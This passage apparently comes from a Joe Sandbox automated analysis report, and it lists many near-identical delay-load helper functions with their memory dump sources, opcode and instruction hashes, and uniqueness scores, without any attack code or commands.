                                                                                              • Opcode Fuzzy Hash: d191b870a800277609cb6ba82088613d1884df22673101d13df3b50a4a700ce8
                                                                                              • Instruction Fuzzy Hash: 4EB012A52682107E321B51183D13E3A016CC4C0B25330C43FF404CD040D4846C841031
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F71F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F70C
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 89d940542775bc182092bc3a6ee36c65977409517b670e2d9d8a3f86ac709c8e
                                                                                              • Instruction ID: 170f1dc8cbc9f1834217b1cc8c41d0ad57b6c8a633bcd4aec7e8903ea46f7ad2
                                                                                              • Opcode Fuzzy Hash: 89d940542775bc182092bc3a6ee36c65977409517b670e2d9d8a3f86ac709c8e
                                                                                              • Instruction Fuzzy Hash: 2BB012A56681107E320B51183E13E36016CC4C0B11330843FF005CC040D6C05D810031
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F373 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b03cee7e5de3f3aed435f773838288d3bc42f9538e914e21dfa6294484c79650
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: b03cee7e5de3f3aed435f773838288d3bc42f9538e914e21dfa6294484c79650
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F3B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 14e354f31a348c573ef57aaeca33394f6f65b78b724987dc8a0e9b92e148ba23
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: 14e354f31a348c573ef57aaeca33394f6f65b78b724987dc8a0e9b92e148ba23
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F3F5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 70a1d0b7057bc9fa7b84e0ddc99eace76eb4bfa6bc827222f9bbc2e94296c679
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: 70a1d0b7057bc9fa7b84e0ddc99eace76eb4bfa6bc827222f9bbc2e94296c679
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F3FF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 99f13127c77671b990ad214c1b9a06ec398f2d0bfc7b9ffac260b0fe6c7b1580
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: 99f13127c77671b990ad214c1b9a06ec398f2d0bfc7b9ffac260b0fe6c7b1580
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F3EB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 181adfd4ff33e6a2b18b58122fd5b9efb0379beac7e465c6f915233a850a97d7
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: 181adfd4ff33e6a2b18b58122fd5b9efb0379beac7e465c6f915233a850a97d7
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F3D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0b7479091f3c9279baad13e1e992b561060fb4c82413ffc3586aebf6e358ec64
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: 0b7479091f3c9279baad13e1e992b561060fb4c82413ffc3586aebf6e358ec64
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F431 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 189691701d701728625afa356ec7d9ae8f72a5187ec3608a12788435fc69a707
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: 189691701d701728625afa356ec7d9ae8f72a5187ec3608a12788435fc69a707
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F427 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f4ceabae29c297faa49c488263468c3bd449aacf874b7ffa536bf66183134e28
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: f4ceabae29c297faa49c488263468c3bd449aacf874b7ffa536bf66183134e28
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F413 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 9add70e7793982fccd48eb6848334d294a71342bcd4ce3f71f308840a7d65296
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: 9add70e7793982fccd48eb6848334d294a71342bcd4ce3f71f308840a7d65296
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F41D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: e96ee55911f15e6e3fb30795f728606891a909039fd9faece371db8e7b89d028
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: e96ee55911f15e6e3fb30795f728606891a909039fd9faece371db8e7b89d028
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F409 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: e9be8be63629058cf69e6694d20835ba5a8142d2a913b749e5e72b302c7b4468
                                                                                              • Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
                                                                                              • Opcode Fuzzy Hash: e9be8be63629058cf69e6694d20835ba5a8142d2a913b749e5e72b302c7b4468
                                                                                              • Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F564 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 68412345ee1ee3b316534e33f8dc6998dd6299dc3de55e677368bb04fc38c8e9
                                                                                              • Instruction ID: c93a7bc19ea5eb4554313be5510aa29ed2c2bfb38b7d887fb0d08b5fe78402b1
                                                                                              • Opcode Fuzzy Hash: 68412345ee1ee3b316534e33f8dc6998dd6299dc3de55e677368bb04fc38c8e9
                                                                                              • Instruction Fuzzy Hash: A9A001E66A9522BE320A6A627D27D7B126CC4D9BA5330893AF44289481AA806C851071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F56E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
